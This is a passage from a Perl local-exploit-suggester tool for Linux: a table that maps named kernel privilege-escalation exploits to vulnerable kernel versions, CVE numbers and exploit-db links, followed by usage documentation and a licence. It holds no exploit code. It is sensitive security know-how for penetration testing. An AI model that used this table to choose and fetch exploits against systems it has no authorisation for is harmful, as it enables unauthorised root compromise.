vuln => [ '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17' ],
cve => '2006-2451',
mil => 'http://www.exploit-db.com/exploits/2031',
},
'prctl' => {
vuln => [ '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17' ],
mil => 'http://www.exploit-db.com/exploits/2004',
},
'prctl2' => {
vuln => [ '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17' ],
mil => 'http://www.exploit-db.com/exploits/2005',
},
'prctl3' => {
vuln => [ '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17' ],
mil => 'http://www.exploit-db.com/exploits/2006',
},
'prctl4' => {
vuln => [ '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17' ],
mil => 'http://www.exploit-db.com/exploits/2011',
},
'remap' => { vuln => ['2.4'] },
'rip' => { vuln => ['2.2'] },
'stackgrow2' => { vuln => [ '2.4.29', '2.6.10' ] },
'uselib24' => {
vuln => [ '2.6.10', '2.4.17', '2.4.22', '2.4.25', '2.4.27', '2.4.29' ]
},
'newsmp' => { vuln => ['2.6'] },
'smpracer' => { vuln => ['2.4.29'] },
'loginx' => { vuln => ['2.4.22'] },
'exp.sh' => { vuln => [ '2.6.9', '2.6.10', '2.6.16', '2.6.13' ] },
'vmsplice1' => {
vuln => [
'2.6.17', '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22',
'2.6.23', '2.6.24', '2.6.24.1',
],
alt => 'jessica biel',
cve => '2008-0600',
mil => 'http://www.exploit-db.com/exploits/5092',
},
'vmsplice2' => {
vuln => [ '2.6.23', '2.6.24' ],
alt => 'diane_lane',
cve => '2008-0600',
mil => 'http://www.exploit-db.com/exploits/5093',
},
'vconsole' => {
vuln => ['2.6'],
cve => '2009-1046',
},
'sctp' => {
vuln => ['2.6.26'],
cve => '2008-4113',
},
'ftrex' => {
vuln => [
'2.6.11', '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16',
'2.6.17', '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22',
],
cve => '2008-4210',
mil => 'http://www.exploit-db.com/exploits/6851',
},
'exit_notify' => {
vuln => [ '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29' ],
mil => 'http://www.exploit-db.com/exploits/8369',
},
'udev' => {
vuln => [ '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29' ],
alt => 'udev <1.4.1',
cve => '2009-1185',
mil => 'http://www.exploit-db.com/exploits/8478',
},
'sock_sendpage2' => {
vuln => [
'2.4.4', '2.4.5', '2.4.6', '2.4.7', '2.4.8', '2.4.9',
'2.4.10', '2.4.11', '2.4.12', '2.4.13', '2.4.14', '2.4.15',
'2.4.16', '2.4.17', '2.4.18', '2.4.19', '2.4.20', '2.4.21',
'2.4.22', '2.4.23', '2.4.24', '2.4.25', '2.4.26', '2.4.27',
'2.4.28', '2.4.29', '2.4.30', '2.4.31', '2.4.32', '2.4.33',
'2.4.34', '2.4.35', '2.4.36', '2.4.37', '2.6.0', '2.6.1',
'2.6.2', '2.6.3', '2.6.4', '2.6.5', '2.6.6', '2.6.7',
'2.6.8', '2.6.9', '2.6.10', '2.6.11', '2.6.12', '2.6.13',
'2.6.14', '2.6.15', '2.6.16', '2.6.17', '2.6.18', '2.6.19',
'2.6.20', '2.6.21', '2.6.22', '2.6.23', '2.6.24', '2.6.25',
'2.6.26', '2.6.27', '2.6.28', '2.6.29', '2.6.30',
],
alt => 'proto_ops',
cve => '2009-2692',
mil => 'http://www.exploit-db.com/exploits/9436',
},
'sock_sendpage' => {
vuln => [
'2.4.4', '2.4.5', '2.4.6', '2.4.7', '2.4.8', '2.4.9',
'2.4.10', '2.4.11', '2.4.12', '2.4.13', '2.4.14', '2.4.15',
'2.4.16', '2.4.17', '2.4.18', '2.4.19', '2.4.20', '2.4.21',
'2.4.22', '2.4.23', '2.4.24', '2.4.25', '2.4.26', '2.4.27',
'2.4.28', '2.4.29', '2.4.30', '2.4.31', '2.4.32', '2.4.33',
'2.4.34', '2.4.35', '2.4.36', '2.4.37', '2.6.0', '2.6.1',
'2.6.2', '2.6.3', '2.6.4', '2.6.5', '2.6.6', '2.6.7',
'2.6.8', '2.6.9', '2.6.10', '2.6.11', '2.6.12', '2.6.13',
'2.6.14', '2.6.15', '2.6.16', '2.6.17', '2.6.18', '2.6.19',
'2.6.20', '2.6.21', '2.6.22', '2.6.23', '2.6.24', '2.6.25',
'2.6.26', '2.6.27', '2.6.28', '2.6.29', '2.6.30',
],
alt => 'wunderbar_emporium',
cve => '2009-2692',
mil => 'http://www.exploit-db.com/exploits/9435',
},
'udp_sendmsg_32bit' => {
vuln => [
'2.6.1', '2.6.2', '2.6.3', '2.6.4', '2.6.5', '2.6.6',
'2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11', '2.6.12',
'2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17', '2.6.18',
'2.6.19',
],
cve => '2009-2698',
mil =>
'http://downloads.securityfocus.com/vulnerabilities/exploits/36108.c',
},
'pipe.c_32bit' => {
vuln => [
'2.4.4', '2.4.5', '2.4.6', '2.4.7', '2.4.8', '2.4.9',
'2.4.10', '2.4.11', '2.4.12', '2.4.13', '2.4.14', '2.4.15',
'2.4.16', '2.4.17', '2.4.18', '2.4.19', '2.4.20', '2.4.21',
'2.4.22', '2.4.23', '2.4.24', '2.4.25', '2.4.26', '2.4.27',
'2.4.28', '2.4.29', '2.4.30', '2.4.31', '2.4.32', '2.4.33',
'2.4.34', '2.4.35', '2.4.36', '2.4.37', '2.6.15', '2.6.16',
'2.6.17', '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22',
'2.6.23', '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28',
'2.6.29', '2.6.30', '2.6.31',
],
cve => '2009-3547',
mil =>
'http://www.securityfocus.com/data/vulnerabilities/exploits/36901-1.c',
},
'do_pages_move' => {
vuln => [
'2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
'2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29',
'2.6.30', '2.6.31',
],
alt => 'sieve',
cve => '2010-0415',
mil => 'Spenders Enlightenment',
},
'reiserfs' => {
vuln => [
'2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
'2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29',
'2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34',
],
cve => '2010-1146',
mil => 'http://www.exploit-db.com/exploits/12130',
},
'can_bcm' => {
vuln => [
'2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
'2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29',
'2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35',
'2.6.36',
],
cve => '2010-2959',
mil => 'http://www.exploit-db.com/exploits/14814',
},
'rds' => {
vuln => [
'2.6.30', '2.6.31', '2.6.32', '2.6.33',
'2.6.34', '2.6.35', '2.6.36',
],
mil => 'http://www.exploit-db.com/exploits/15285',
cve => '2010-3904',
},
'half_nelson1' => {
vuln => [
'2.6.0', '2.6.1', '2.6.2', '2.6.3', '2.6.4', '2.6.5',
'2.6.6', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11',
'2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17',
'2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
'2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29',
'2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35',
'2.6.36',
],
alt => 'econet',
cve => '2010-3848',
mil => 'http://www.exploit-db.com/exploits/17787',
},
'half_nelson2' => {
vuln => [
'2.6.0', '2.6.1', '2.6.2', '2.6.3', '2.6.4', '2.6.5',
'2.6.6', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11',
'2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17',
'2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
'2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29',
'2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35',
'2.6.36',
],
alt => 'econet',
cve => '2010-3850',
mil => 'http://www.exploit-db.com/exploits/17787',
},
'half_nelson3' => {
vuln => [
'2.6.0', '2.6.1', '2.6.2', '2.6.3', '2.6.4', '2.6.5',
'2.6.6', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11',
'2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17',
'2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
'2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29',
'2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35',
'2.6.36',
],
alt => 'econet',
cve => '2010-4073',
mil => 'http://www.exploit-db.com/exploits/17787',
},
'caps_to_root' => {
vuln => [ '2.6.34', '2.6.35', '2.6.36' ],
cve => 'n/a',
mil => 'http://www.exploit-db.com/exploits/15916',
},
'american-sign-language' => {
vuln => [
'2.6.0', '2.6.1', '2.6.2', '2.6.3', '2.6.4', '2.6.5',
'2.6.6', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11',
'2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17',
'2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
'2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29',
'2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35',
'2.6.36',
],
cve => '2010-4347',
mil => 'http://www.securityfocus.com/bid/45408',
},
'pktcdvd' => {
vuln => [
'2.6.0', '2.6.1', '2.6.2', '2.6.3', '2.6.4', '2.6.5',
'2.6.6', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11',
'2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17',
'2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
'2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29',
'2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35',
'2.6.36',
],
cve => '2010-3437',
mil => 'http://www.exploit-db.com/exploits/15150',
},
'video4linux' => {
vuln => [
'2.6.0', '2.6.1', '2.6.2', '2.6.3', '2.6.4', '2.6.5',
'2.6.6', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11',
'2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17',
'2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
'2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29',
'2.6.30', '2.6.31', '2.6.32', '2.6.33',
],
cve => '2010-3081',
mil => 'http://www.exploit-db.com/exploits/15024',
},
'memodipper' => {
vuln => [
'2.6.39', '3.0.0', '3.0.1', '3.0.2', '3.0.3', '3.0.4',
'3.0.5', '3.0.6', '3.1.0',
],
cve => '2012-0056',
mil => 'http://www.exploit-db.com/exploits/18411',
},
'semtex' => {
vuln => [
'2.6.37', '2.6.38', '2.6.39', '3.0.0', '3.0.1', '3.0.2',
'3.0.3', '3.0.4', '3.0.5', '3.0.6', '3.1.0',
],
cve => '2013-2094',
mil => 'http://www.exploit-db.com/exploits/25444',
},
'perf_swevent' => {
vuln => [
'3.0.0', '3.0.1', '3.0.2', '3.0.3', '3.0.4', '3.0.5',
'3.0.6', '3.1.0', '3.2.0', '3.3.0', '3.4.0', '3.4.1',
'3.4.2', '3.4.3', '3.4.4', '3.4.5', '3.4.6', '3.4.8',
'3.4.9', '3.5.0', '3.6.0', '3.7.0', '3.8.0', '3.8.1',
'3.8.2', '3.8.3', '3.8.4', '3.8.5', '3.8.6', '3.8.7',
'3.8.8', '3.8.9',
],
cve => '2013-2094',
mil => 'http://www.exploit-db.com/exploits/26131',
},
'msr' => {
vuln => [
'2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
'2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.27', '2.6.28',
'2.6.29', '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34',
'2.6.35', '2.6.36', '2.6.37', '2.6.38', '2.6.39', '3.0.0',
'3.0.1', '3.0.2', '3.0.3', '3.0.4', '3.0.5', '3.0.6',
'3.1.0', '3.2.0', '3.3.0', '3.4.0', '3.5.0', '3.6.0',
'3.7.0', '3.7.6',
],
cve => '2013-0268',
mil => 'http://www.exploit-db.com/exploits/27297',
},
'timeoutpwn' => {
vuln => [
'3.4.0', '3.5.0', '3.6.0', '3.7.0', '3.8.0', '3.8.9',
'3.9.0', '3.10.0', '3.11.0', '3.12.0', '3.13.0', '3.4.0',
'3.5.0', '3.6.0', '3.7.0', '3.8.0', '3.8.5', '3.8.6',
'3.8.9', '3.9.0', '3.9.6', '3.10.0', '3.10.6', '3.11.0',
'3.12.0', '3.13.0', '3.13.1'
],
cve => '2014-0038',
mil => 'http://www.exploit-db.com/exploits/31346',
},
'rawmodePTY' => {
vuln => [
'2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35', '2.6.36',
'2.6.37', '2.6.38', '2.6.39', '3.14.0', '3.15.0'
],
cve => '2014-0196',
mil => 'http://packetstormsecurity.com/files/download/126603/cve-2014-0196-md.c',
},
'overlayfs' => {
vuln => [
'3.13.0', '3.16.0', '3.19.0'
],
cve => '2015-8660',
mil => 'http://www.exploit-db.com/exploits/39230',
},
'pp_key' => {
vuln => [
'3.4.0', '3.5.0', '3.6.0', '3.7.0', '3.8.0', '3.8.1',
'3.8.2', '3.8.3', '3.8.4', '3.8.5', '3.8.6', '3.8.7',
'3.8.8', '3.8.9', '3.9.0', '3.9.6', '3.10.0', '3.10.6',
'3.11.0', '3.12.0', '3.13.0', '3.13.1'
],
cve => '2016-0728',
mil => 'http://www.exploit-db.com/exploits/39277',
},
'dirty_cow' => {
vuln => [
'2.6.22', '2.6.23', '2.6.24', '2.6.25', '2.6.26', '2.6.27',
'2.6.27', '2.6.28', '2.6.29', '2.6.30', '2.6.31', '2.6.32',
'2.6.33', '2.6.34', '2.6.35', '2.6.36', '2.6.37', '2.6.38',
'2.6.39', '3.0.0', '3.0.1', '3.0.2', '3.0.3', '3.0.4',
'3.0.5', '3.0.6', '3.1.0', '3.2.0', '3.3.0', '3.4.0',
'3.5.0', '3.6.0', '3.7.0', '3.7.6', '3.8.0', '3.9.0',
'3.10.0', '3.11.0', '3.12.0', '3.13.0', '3.14.0', '3.15.0',
'3.16.0', '3.17.0', '3.18.0', '3.19.0', '4.0.0', '4.1.0',
'4.2.0', '4.3.0', '4.4.0', '4.5.0', '4.6.0', '4.7.0'
],
cve => '2016-5195',
mil => 'http://www.exploit-db.com/exploits/40616',
},
'af_packet' => {
vuln => ['4.4.0' ],
cve => '2016-8655',
mil => 'http://www.exploit-db.com/exploits/40871',
},
'packet_set_ring' => {
vuln => ['4.8.0' ],
cve => '2017-7308',
mil => 'http://www.exploit-db.com/exploits/41994',
},
'clone_newuser' => {
vuln => [
'3.3.5', '3.3.4', '3.3.2', '3.2.13', '3.2.9', '3.2.1',
'3.1.8', '3.0.5', '3.0.4', '3.0.2', '3.0.1', '3.2', '3.0.1', '3.0'
],
cve => 'N\A',
mil => 'http://www.exploit-db.com/exploits/38390',
},
'get_rekt' => {
vuln => [
'4.4.0', '4.8.0', '4.10.0', '4.13.0'
],
cve => '2017-16695',
mil => 'http://www.exploit-db.com/exploits/45010',
},
'exploit_x' => {
vuln => [
'2.6.22', '2.6.23', '2.6.24', '2.6.25', '2.6.26', '2.6.27',
'2.6.27', '2.6.28', '2.6.29', '2.6.30', '2.6.31', '2.6.32',
'2.6.33', '2.6.34', '2.6.35', '2.6.36', '2.6.37', '2.6.38',
'2.6.39', '3.0.0', '3.0.1', '3.0.2', '3.0.3', '3.0.4',
'3.0.5', '3.0.6', '3.1.0', '3.2.0', '3.3.0', '3.4.0',
'3.5.0', '3.6.0', '3.7.0', '3.7.6', '3.8.0', '3.9.0',
'3.10.0', '3.11.0', '3.12.0', '3.13.0', '3.14.0', '3.15.0',
'3.16.0', '3.17.0', '3.18.0', '3.19.0', '4.0.0', '4.1.0',
'4.2.0', '4.3.0', '4.4.0', '4.5.0', '4.6.0', '4.7.0'
],
cve => '2018-14665',
mil => 'http://www.exploit-db.com/exploits/45697',
},
);
}
__END__
=head1 NAME
linux_exploit_suggester-2.pl - A local exploit suggester for linux
=head1 DESCRIPTION
This perl script will enumerate the possible exploits available for a given kernel version
=head1 USAGE
[-h] Help (this message)
[-k] Kernel number (eg. 2.6.28)
[-d] Open exploit download menu
You can also provide a partial kernel version (eg. 2.4)
to see all exploits available.
=head1 AUTHOR
Jonathan Donas (c) 2019
=head1 CHANGELOG
27-03-2019 added exploit download menu
31-12-2018 added exploit_x
30-11-2018 added get_rekt
15-04-2018 added clone_newuser
23-11-2017 added packet_set_ring
05-11-2017 added af_packet
28-04-2017 added dirty_cow
25-07-2016 added overlayfs and pp_key
=cut
=head1 LICENSE
Linux Exploit Suggester 2
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License along
with this program; if not, write to the Free Software Foundation, Inc.,
51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
=cut